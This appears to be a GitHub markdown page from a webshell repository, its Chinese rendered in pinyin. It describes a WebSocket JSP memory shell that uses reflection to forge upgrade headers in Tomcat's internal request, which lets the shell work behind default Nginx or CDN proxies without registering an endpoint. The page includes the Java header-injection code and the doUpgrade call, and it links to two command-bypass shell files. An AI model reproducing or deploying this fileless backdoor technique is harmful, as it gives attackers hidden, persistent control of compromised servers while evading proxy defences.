Dark Mode

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Latest commit

History

History
64 lines (52 loc) * 3.2 KB

wsNotAddEndpoint.md

File metadata and controls

64 lines (52 loc) * 3.2 KB

Wu Xu Zhu Ru ,Ke Yi Rao Guo Nginx, CDNDai Li Xian Zhi De WebSocket jspMa

Zhi Qian Ti Dao Guo Ke Yi Xiang WsServerContainer Rong Qi Nei Tian Jia ServerEndpointConfig Lai Zhu Ce WebSocketNei Cun Ma ,Zhe Yang Ji You Hao Chu Ye You Bi Duan ,Hao Chu Shi Nei Cun Ma Wu Luo Di Wen Jian ,Bu Hao De Di Fang Shi Rong Yi Shou Xian Zhi Wu Fa Shi Yong . Yu Shi ,Wo Zui Jin Gai Xie Liao Xia Jiao Ben De Nei Rong ,Zhi Jie Qu jspNei De requestJin Xing Xie Yi Sheng Ji ,Cong Er Bu Xu Yao Jin Xing Zhu Ce Lu Jing Deng Cao Zuo ,Zeng Jia Liao HttpServletRequestDe Header,Shi Qi Ke Yi Zai NginxDai Li Mo Ren Pei Zhi Xia Shi Yong

NginxMo Ren Dai Li Pei Zhi Ben Shen Shi Bu Zhi Chi WebSocketXie Yi De ,Xu Yao Xiu Gai /etc/nginx/conf.d/nginx.conf,Zeng Jia proxy_set_header Nei Rong ,Wang Shang Ye Ke Yi Sou Dao Xu Duo Zi Liao ,Qi Shi Jiu Shi Zeng Jia Liao Liang Ge Wen Jian Tou ,Bing Wei Zuo Qi Ta Chu Li .

Na Qi Shi Wo Men Wan Quan Ke Yi Zai ServerDuan Lan Jie requestZi Ji Tian Jia Wen Jian Tou Lai Zhi Chi WebSocket

private void SetHeader(HttpServletRequest request, String key, String value){
Classextends HttpServletRequest> requestClass = request.getClass();
try {
Field requestField = requestClass.getDeclaredField("request");
requestField.setAccessible(true);
Object requestObj = requestField.get(request);
Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
coyoteRequestField.setAccessible(true);
Object coyoteRequestObj = coyoteRequestField.get(requestObj);
Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
headersField.setAccessible(true);
MimeHeaders headersObj = (MimeHeaders)headersField.get(coyoteRequestObj);
headersObj.removeHeader(key);
headersObj.addValue(key).setString(value);
} catch (Exception e) {
e.printStackTrace();
}
}

SetHeader(request,"Connection","upgrade");
SetHeader(request,"Sec-WebSocket-Version","13");
SetHeader(request,"Upgrade","websocket");

Tong Guo Tian Jia Zhe San Ge Wen Jian Tou ,TomcatJiu Ke Yi Tong Guo Hou Xu De doUpgradeXiao Yan Liao

if (!headerContainsToken(req, Constants.CONNECTION_HEADER_NAME,
Constants.CONNECTION_HEADER_VALUE)) {
resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
return;
}
if (!headerContainsToken(req, Constants.WS_VERSION_HEADER_NAME,
Constants.WS_VERSION_HEADER_VALUE)) {
resp.setStatus(426);
resp.setHeader(Constants.WS_VERSION_HEADER_NAME,
Constants.WS_VERSION_HEADER_VALUE);
return;
}
key = req.getHeader(Constants.WS_KEY_HEADER_NAME);
if (key == null) {
resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
return;
}

Tomcat Shi Tong Guo org.apache.tomcat.websocket.server.UpgradeUtil.doUpgrade Lai Ba httpXie Yi Sheng Ji Wei WebSocket

Na Ba Xu Yao De Nei Rong Chuan Ru Jin Qu ,Ji Ke Wan Cheng jspWen Jian Lian Jie WebSocketDe Gong Neng

UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);

Rao Guo Dai Ma :https://github.com/veo/wsMemShell/blob/main/BypassNginxCDN/cmdbypass.jsp

Rao Guo Fang Shi Er Dai Ma :https://github.com/veo/wsMemShell/blob/main/BypassNginxCDN/cmdbypass2.jsp